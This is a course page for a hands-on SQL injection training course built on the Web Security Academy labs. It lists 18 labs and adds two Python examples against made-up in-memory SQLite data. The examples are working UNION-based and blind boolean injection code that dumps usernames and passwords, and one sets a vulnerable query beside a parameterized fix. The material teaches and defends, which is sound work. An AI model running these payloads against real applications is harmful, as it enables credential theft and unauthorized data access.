Mastering SQL Injection - The Ultimate Hands-On Course
For a long time, up until a few years ago, SQL injection ranked as the number one most critical security risk facing web applications. Although the vulnerability itself is simple to learn and exploit, it can lead to disastrous consequences, leaving an organization open to severe risks such as sensitive information disclosure, authentication bypass and even remote code execution.
In this course, we dive into the technical details behind SQL injection vulnerabilities and the different types of SQL injection, how to find them from both a black-box and a white-box perspective, and the different ways to exploit them. We also cover the techniques used to prevent and mitigate these types of vulnerabilities.
This is not your average course that just teaches you the basics of SQL injection. This course contains over 9 hours' worth of content that not only describes the technical details behind SQL injection vulnerabilities, but also contains 18 labs that give you hands-on experience exploiting real-world examples. The labs are of varying difficulty levels, starting with very simple examples and slowly moving up in difficulty.
If you're a penetration tester, application security specialist, bug bounty hunter, software developer, ethical hacker, or just anyone interested in web application security, this course is for you!
Lab #1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data (video lesson)
In this video, we cover Lab #1 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.
Lab #2: SQL injection vulnerability allowing login bypass (video lesson)
In this video, we cover Lab #2 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the login function. To solve the lab, we perform a SQL injection attack that bypasses authentication and allows us to log into the application as the administrator user.
Lab #3: SQL injection UNION attack, determining the number of columns returned by the query (video lesson)
In this video, we cover Lab #3 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. This vulnerability can be exploited using a UNION attack to retrieve data from other tables. To solve the lab, we perform a SQL injection attack that determines the number of columns being returned by the query. This is the first step of a SQL injection UNION attack, and we use this technique in subsequent labs to construct the full attack.
Lab #4: SQL injection UNION attack, finding a column containing text (video lesson)
In this video, we cover Lab #4 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a SQL injection attack that returns an additional row containing the value we provide. This technique helps us determine which columns are compatible with string data.
Lab #5: SQL injection UNION attack, retrieving data from other tables (video lesson)
In this video, we cover Lab #5 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack that retrieves the usernames and passwords of the users of the application.
Lab #6: SQL injection UNION attack, retrieving multiple values in a single column (video lesson)
In this video, we cover Lab #6 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack that retrieves the usernames and passwords of the users of the application concatenated into a single column.
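The UNION attack built up across Labs #3 to #6, as an added example that is not part of the course or of the Web Security Academy labs. It runs against a constructed in-memory SQLite schema (the table and column names, the sample rows and the `abc123`-style values are made up for this example) and shows the vulnerable category filter next to a parameterized one: the column-count probe, the text-column probe, the cross-table `UNION SELECT` and the single-column concatenation all succeed against the first and return nothing against the second. SQLite's dialect is used because it runs offline; the lab databases are PostgreSQL, Oracle, MySQL and Microsoft SQL Server, where comment syntax, type strictness and concatenation operators differ.

```python
import sqlite3

# Constructed in-memory stand-in for the Academy's shop database. The rows are
# made up for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES
            (1, 'Widget', 9.99, 'Gifts', 1),
            (2, 'Gizmo', 19.99, 'Gifts', 0),
            (3, 'Lamp', 29.99, 'Home', 1);
        INSERT INTO users VALUES ('administrator', 's3cr3t'), ('wiener', 'peter');
    """)
    return conn

# Vulnerable category filter: the user-supplied value is pasted into the SQL text.
def filter_products_vulnerable(conn, category):
    sql = ("SELECT name, price, category FROM products "
           "WHERE category = '" + category + "' AND released = 1")
    return conn.execute(sql).fetchall()

# Hardened filter: the value travels as a bound parameter and is never parsed as SQL.
def filter_products_safe(conn, category):
    sql = ("SELECT name, price, category FROM products "
           "WHERE category = ? AND released = 1")
    return conn.execute(sql, (category,)).fetchall()

# Lab 3: append UNION SELECT NULL,NULL,... with a growing number of NULLs until the
# database stops raising a column-count mismatch; that count is the answer.
def count_columns(conn, max_cols=10):
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            filter_products_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None

# Lab 4: place a marker string in one position at a time; positions where the
# marker comes back in a row accept text. SQLite is dynamically typed, so every
# position qualifies here; PostgreSQL or Oracle would raise a type error for a
# numeric column instead, which is exactly the signal the lab relies on.
def text_columns(conn, n_cols, marker="aBcDeF"):
    hits = []
    for i in range(n_cols):
        cols = ["NULL"] * n_cols
        cols[i] = "'" + marker + "'"
        payload = "' UNION SELECT " + ",".join(cols) + "--"
        try:
            rows = filter_products_vulnerable(conn, payload)
        except sqlite3.OperationalError:
            continue
        if any(row[i] == marker for row in rows):
            hits.append(i)
    return hits

# Lab 5: with the column count known, pull rows from another table.
def dump_users(conn, n_cols):
    cols = ["NULL"] * n_cols
    cols[0], cols[1] = "username", "password"
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users--"
    rows = filter_products_vulnerable(conn, payload)
    return sorted((r[0], r[1]) for r in rows)

# Lab 6: the same data squeezed into one text column with a separator
# (SQLite and PostgreSQL use ||; MySQL uses CONCAT(); Microsoft uses +).
def dump_users_single_column(conn, n_cols, col_index=0):
    cols = ["NULL"] * n_cols
    cols[col_index] = "username || '~' || password"
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users--"
    rows = filter_products_vulnerable(conn, payload)
    return sorted(r[col_index] for r in rows)

if __name__ == "__main__":
    db = build_db()
    n = count_columns(db)
    print("columns:", n, "text columns:", text_columns(db, n))
    print("users:", dump_users(db, n))
    print("single column:", dump_users_single_column(db, n))
    attack = "' UNION SELECT username, password, NULL FROM users--"
    print("same payload against the parameterized query:", filter_products_safe(db, attack))
```

The `--` at the end of every payload comments out the trailing `' AND released = 1`, which is why unreleased rows and foreign tables come back at all. The parameterized version has no such seam: the entire payload is compared against the category column as a string and matches nothing.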
Lab #7: SQL injection attack, querying the database type and version on Oracle (video lesson)
In this video, we cover Lab #7 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack that queries the database type and version on Oracle.
Lab #8: SQL injection attack, querying the database type and version on MySQL and Microsoft (video lesson)
In this video, we cover Lab #8 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack that queries the database type and version on Microsoft and MySQL databases.
Lab #9: SQL injection attack, listing the database contents on non-Oracle databases (video lesson)
In this video, we cover Lab #9 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack on a PostgreSQL database that retrieves the usernames and passwords of all users of the application.
Lab #10: SQL injection attack, listing the database contents on Oracle (video lesson)
In this video, we cover Lab #10 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category filter. To solve the lab, we perform a UNION-based SQL injection attack on an Oracle database that retrieves the usernames and passwords of all users of the application.
Lab #11: Blind SQL injection with conditional responses (video lesson)
In this video, we cover Lab #11 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind SQL injection attack that uses the application's conditional responses to retrieve the password of the administrator user, one character at a time.
Lab #12: Blind SQL injection with conditional errors (video lesson)
In this video, we cover Lab #12 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind SQL injection attack that triggers a database error conditionally, and use that error to retrieve the password of the administrator user.
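The character-by-character extraction behind Labs #11 and #12, as an added example that is not part of the course or of the Web Security Academy labs. It runs against a constructed in-memory SQLite database (the `tracking` and `users` tables, the `abc123` cookie value and the sample password are made up for this example). The application leaks exactly one bit per request, whether a "Welcome back" banner appears, and the attacker turns an arbitrary SQL condition into that bit. A binary search over the printable ASCII range recovers each character in about seven requests instead of one per candidate. SQLite's `UNICODE()` is the code-point function; PostgreSQL and MySQL use `ASCII()`.

```python
import sqlite3

# Constructed in-memory stand-in for the lab: a tracking-cookie table and a users
# table. Rows are made up for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tracking (id TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO tracking VALUES ('abc123');
        INSERT INTO users VALUES ('administrator', 's3cr3t'), ('wiener', 'peter');
    """)
    return conn

# Vulnerable lookup of the TrackingId cookie. The page shows a "Welcome back"
# banner when the query returns a row and nothing otherwise; that one bit is the
# only feedback the attacker gets.
def welcome_back(conn, tracking_id):
    sql = "SELECT 1 FROM tracking WHERE id = '" + tracking_id + "'"
    return conn.execute(sql).fetchone() is not None

class BlindOracle:
    """Turns any boolean SQL condition into a true/false answer via the banner."""

    def __init__(self, conn, known_cookie="abc123"):
        self.conn = conn
        self.cookie = known_cookie
        self.queries = 0  # request count, to show the cost of each step

    def ask(self, condition):
        self.queries += 1
        # Valid cookie AND (condition): the banner appears only when the condition holds.
        payload = self.cookie + "' AND (" + condition + ")--"
        return welcome_back(self.conn, payload)

# Subquery for the value being stolen; kept as a string so every condition can embed it.
ADMIN_PW = "(SELECT password FROM users WHERE username = 'administrator')"

def find_password_length(oracle, max_len=64):
    for n in range(1, max_len + 1):
        if oracle.ask("LENGTH(%s) = %d" % (ADMIN_PW, n)):
            return n
    return None

def extract_password(oracle, length):
    # Binary search over printable ASCII (32..126) for each position.
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("UNICODE(SUBSTR(%s, %d, 1)) > %d" % (ADMIN_PW, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)

if __name__ == "__main__":
    oracle = BlindOracle(build_db())
    n = find_password_length(oracle)
    print("length:", n)
    print("password:", extract_password(oracle, n), "after", oracle.queries, "requests")
```

The whole attack lives in `BlindOracle.ask`; the search loops never look at the data directly. For the conditional-errors variant of Lab #12 the only change is there: instead of testing for the banner, `ask` wraps the condition so that a true condition forces a database error (for example via a `CASE` expression whose `THEN` branch cannot be evaluated) and reports whether the request failed. For the time-delay labs it would instead sleep conditionally and measure the response time.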
Lab #13: Blind SQL injection with time delays (video lesson)
In this video, we cover Lab #13 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the time-based SQL injection vulnerability to cause a 10-second delay in the response.
Lab #14: Blind SQL injection with time delays and information retrieval (video lesson)
In this video, we cover Lab #14 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the time-based SQL injection vulnerability to retrieve the password of the administrator user.
Note: Changes to Burp Collaborator (text lesson)
Lab #15: Blind SQL injection with out-of-band interaction (video lesson)
In this video, we cover Lab #15 in the SQL injection module of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the SQL injection vulnerability to cause the database to perform a DNS lookup against Burp Collaborator.
Lab #16: Blind SQL injection with out-of-band data exfiltration (video lesson)
In this video, we cover Lab #16 in the SQL injection module of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the out-of-band SQL injection vulnerability to exfiltrate the administrator password.
Lab #17: SQL injection with filter bypass via XML encoding (video lesson)
In this video, we cover Lab #17 in the SQL injection module of the Web Security Academy. This lab contains a SQL injection vulnerability in its stock check feature. The results of the query are returned in the application's response, so we can use a UNION attack to retrieve data from other tables.
The database contains a users table, which holds the usernames and passwords of registered users. To solve the lab, we perform a SQL injection attack that retrieves the admin user's credentials, then log in to their account.
Lab #18: Visible error-based SQL injection (video lesson)
In this video, we cover Lab #18 in the SQL injection module of the Web Security Academy. This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, but error messages are.
The database also contains a table called users, with columns called username and password. To solve the lab, we find a way to leak the password of the administrator user through the error messages, then log in to their account.
